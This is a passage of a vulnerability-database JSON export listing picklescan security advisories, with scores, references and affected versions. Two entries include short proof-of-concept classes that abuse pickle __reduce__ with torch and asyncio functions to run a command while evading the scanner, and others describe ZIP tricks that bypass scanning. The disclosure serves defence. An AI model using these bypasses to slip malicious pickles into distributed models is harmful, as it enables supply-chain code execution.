"" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-p9w7-82w4-7q8m" }, { "reference_url": "https://github.com/advisories/GHSA-p9w7-82w4-7q8m", "reference_id": "GHSA-p9w7-82w4-7q8m", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-p9w7-82w4-7q8m" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/89082?format=api", "purl": "pkg:pypi/picklescan@0.0.30", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.30" } ], "aliases": [ "GHSA-p9w7-82w4-7q8m" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-hm3p-7t8t-bfb7" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360526?format=api", "vulnerability_id": "VCID-jsfv-qjzd-87ck", "summary": "Duplicate Advisory: Picklescan: ZIP archive scan bypass is possible through non-exhaustive Cyclic Redundancy Check\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-m4j5-5x4r-2xp9. This link is maintained to preserve external references.\n\n### Original Description\nAn Improper Handling of Exceptional Conditions vulnerability in the ZIP archive scanning component of mmaitre314 picklescan allows a remote attacker to bypass security scans. This is achieved by crafting a ZIP archive containing a file with a bad Cyclic Redundancy Check (CRC), which causes the scanner to halt and fail to analyze the contents for malicious pickle files. When the file incorrectly considered safe is loaded, it can lead to the execution of malicious code.", "references": [ { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-10156", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-10156" }, { "reference_url": "https://github.com/advisories/GHSA-4vr7-g93g-cf6m", "reference_id": "GHSA-4vr7-g93g-cf6m", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-4vr7-g93g-cf6m" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-mjqp-26hc-grxg", "reference_id": "GHSA-mjqp-26hc-grxg", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-mjqp-26hc-grxg" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/89083?format=api", "purl": "pkg:pypi/picklescan@0.0.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.31" } ], "aliases": [ "GHSA-4vr7-g93g-cf6m" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jsfv-qjzd-87ck" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/212453?format=api", "vulnerability_id": "VCID-judk-maax-muc7", "summary": "Picklescan missing detection when calling pty.spawn", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/70c1c6c31beb6baaf52c8db1b6c3c0e84a6f9dab", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/70c1c6c31beb6baaf52c8db1b6c3c0e84a6f9dab" }, { "reference_url": "https://github.com/mmaitre314/picklescan/pull/53", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/pull/53" }, { "reference_url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.33", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.33" }, { "reference_url": "https://github.com/advisories/GHSA-vqmv-47xg-9wpr", "reference_id": "GHSA-vqmv-47xg-9wpr", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-vqmv-47xg-9wpr" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-vqmv-47xg-9wpr", "reference_id": "GHSA-vqmv-47xg-9wpr", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-vqmv-47xg-9wpr" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/36380?format=api", "purl": "pkg:pypi/picklescan@0.0.33", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.33" } ], "aliases": [ "GHSA-vqmv-47xg-9wpr" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-judk-maax-muc7" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/212706?format=api", "vulnerability_id": "VCID-k92s-yfxv-hqhr", "summary": "PickleScan's profile.run blocklist mismatch allows exec() bypass", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/advisories/GHSA-7wx9-6375-f5wh", "reference_id": "GHSA-7wx9-6375-f5wh", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-7wx9-6375-f5wh" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-7wx9-6375-f5wh", "reference_id": "GHSA-7wx9-6375-f5wh", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-7wx9-6375-f5wh" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/40119?format=api", "purl": "pkg:pypi/picklescan@1.0.4", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@1.0.4" } ], "aliases": [ "GHSA-7wx9-6375-f5wh" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-k92s-yfxv-hqhr" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/115358?format=api", "vulnerability_id": "VCID-kmwg-e2gf-9yb7", "summary": "picklescan before 0.0.23 is vulnerable to a ZIP archive manipulation attack that causes it to crash when attempting to extract and scan PyTorch model archives. By modifying the filename in the ZIP header while keeping the original filename in the directory listing, an attacker can make PickleScan raise a BadZipFile error. However, PyTorch's more forgiving ZIP implementation still allows the model to be loaded, enabling malicious payloads to bypass detection.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-1944", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00144", "scoring_system": "epss", "scoring_elements": "0.34534", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00144", "scoring_system": "epss", "scoring_elements": "0.34715", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00144", "scoring_system": "epss", "scoring_elements": "0.34735", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00144", "scoring_system": "epss", "scoring_elements": "0.34711", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-1944" }, { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/picklescan/PYSEC-2025-20.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/advisory-database/tree/main/vulns/picklescan/PYSEC-2025-20.yaml" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1944", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1944" }, { "reference_url": "https://sites.google.com/sonatype.com/vulnerabilities/cve-2025-1944", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://sites.google.com/sonatype.com/vulnerabilities/cve-2025-1944" }, { "reference_url": "https://www.sonatype.com/security-advisories/cve-2025-1944", "reference_id": "cve-2025-1944", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:L/SC:N/SI:L/SA:L" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-03-10T12:08:11Z/" } ], "url": "https://www.sonatype.com/security-advisories/cve-2025-1944" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/e58e45e0d9e091159c1554f9b04828bbb40b9781", "reference_id": "e58e45e0d9e091159c1554f9b04828bbb40b9781", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:L/SC:N/SI:L/SA:L" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-03-10T12:08:11Z/" } ], "url": "https://github.com/mmaitre314/picklescan/commit/e58e45e0d9e091159c1554f9b04828bbb40b9781" }, { "reference_url": "https://github.com/advisories/GHSA-7q5r-7gvp-wc82", "reference_id": "GHSA-7q5r-7gvp-wc82", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-7q5r-7gvp-wc82" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-7q5r-7gvp-wc82", "reference_id": "GHSA-7q5r-7gvp-wc82", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:L/SC:N/SI:L/SA:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-03-10T12:08:11Z/" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-7q5r-7gvp-wc82" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/87037?format=api", "purl": "pkg:pypi/picklescan@0.0.23", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cce-4mst-r7h4" }, { "vulnerability": "VCID-1cft-ke16-8kac" }, { "vulnerability": "VCID-357d-3wwy-aubk" }, { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-3ykn-199q-u3hf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-4nda-nuz6-gqgm" }, { "vulnerability": "VCID-555e-6p5m-xbbc" }, { "vulnerability": "VCID-6723-ghp7-yqd1" }, { "vulnerability": "VCID-6pqf-4qcr-ckac" }, { "vulnerability": "VCID-6smr-kf6r-53gc" }, { "vulnerability": "VCID-7dgj-c6cm-v3bt" }, { "vulnerability": "VCID-7jv5-uxzs-cucb" }, { "vulnerability": "VCID-83zm-7pnx-gkag" }, { "vulnerability": "VCID-8bj4-tmz9-gyau" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-av36-fvk2-23be" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-b4zf-mwfc-53bm" }, { "vulnerability": "VCID-b8nm-k5xu-yfc8" }, { "vulnerability": "VCID-bepy-gm8w-83e5" }, { "vulnerability": "VCID-brvs-drts-rbay" }, { "vulnerability": "VCID-c3as-vdkf-4fem" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cj2u-dmaj-wbd4" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-cupp-7ca3-wfa6" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-d1k5-6npz-2kcg" }, { "vulnerability": "VCID-d4vv-a8kx-5kdc" }, { "vulnerability": "VCID-dsy5-2z6e-jqds" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fbng-xtyv-zqdf" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fsjg-pn1f-fqd6" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": "VCID-hm3p-7t8t-bfb7" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-kne4-tcp8-m3c3" }, { "vulnerability": "VCID-n3yg-3gcp-nyc1" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-rqap-hdeb-1ffb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-v5yc-uwn3-akbc" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhdd-ck3x-pbh7" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" }, { "vulnerability": "VCID-zxc5-cgwk-qbcn" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.23" } ], "aliases": [ "CVE-2025-1944", "GHSA-7q5r-7gvp-wc82", "PYSEC-2025-20" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-kmwg-e2gf-9yb7" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360679?format=api", "vulnerability_id": "VCID-kne4-tcp8-m3c3", "summary": "Picklescan is missing detection when calling pytorch function torch.utils.bottleneck.__main__.run_autograd_prof\n### Summary\n\nUsing torch.utils.bottleneck.\\_\\_main\\_\\_.run_autograd_prof function, which is a pytorch library function to execute remote pickle file.\n\n### Details\n\nThe attack payload executes in the following steps:\n\nFirst, the attacker craft the payload by calling to torch.utils.bottleneck.__main__.run_autograd_prof function in reduce method\nThen when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.\n\n### PoC\n\n```\nimport torch.utils.bottleneck.__main__ as bottleneck_main\n\nclass EvilTorchUtilsBottleneckRunAutogradProf:\n def __reduce__(self):\n code = '__import__(\"os\").system(\"whoami\")'\n globs = {}\n return bottleneck_main.run_autograd_prof, (code, globs)\n```\n\n### Impact\n\nWho is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.\nWhat is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.\nSupply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.\n\n### Corresponding\n\nhttps://github.com/FredericDT\nhttps://github.com/Qhaoduoyu", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/1931c2d04eaca8d20597705ff39cab78ba364e4b", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/1931c2d04eaca8d20597705ff39cab78ba364e4b" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-4whj-rm5r-c2v8", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-4whj-rm5r-c2v8" }, { "reference_url": "https://github.com/advisories/GHSA-4whj-rm5r-c2v8", "reference_id": "GHSA-4whj-rm5r-c2v8", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-4whj-rm5r-c2v8" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/89082?format=api", "purl": "pkg:pypi/picklescan@0.0.30", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.30" } ], "aliases": [ "GHSA-4whj-rm5r-c2v8" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-kne4-tcp8-m3c3" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360676?format=api", "vulnerability_id": "VCID-n3yg-3gcp-nyc1", "summary": "Picklescan is missing detection when calling built-in python library asyncio.unix_events._UnixSubprocessTransport._start\n### Summary\n\nUsing asyncio.unix_events._UnixSubprocessTransport._start function, which is a built-in python library function to execute remote pickle file.\n\n### Details\n\nThe attack payload executes in the following steps:\n\nFirst, the attacker craft the payload by calling to asyncio.unix_events._UnixSubprocessTransport._start function in reduce method\nThen when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.\n\n### PoC\n\n```\nfrom asyncio.unix_events import _UnixSubprocessTransport\nfrom types import SimpleNamespace\n\nclass EvilAsyncioUnixSubprocessTransportStart:\n def __reduce__(self):\n fake_self = SimpleNamespace(\n _loop=None,\n _protocol=None,\n _proc=None\n )\n args = \"whoami\" \n return _UnixSubprocessTransport._start, (\n fake_self, args, True, None, None, None, 0\n )\n```\n\n### Impact\n\nWho is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.\nWhat is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.\nSupply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.\n\n### Corresponding\n\nhttps://github.com/FredericDT\nhttps://github.com/Qhaoduoyu", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/1931c2d04eaca8d20597705ff39cab78ba364e4b", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/1931c2d04eaca8d20597705ff39cab78ba364e4b" }, { "reference_url": 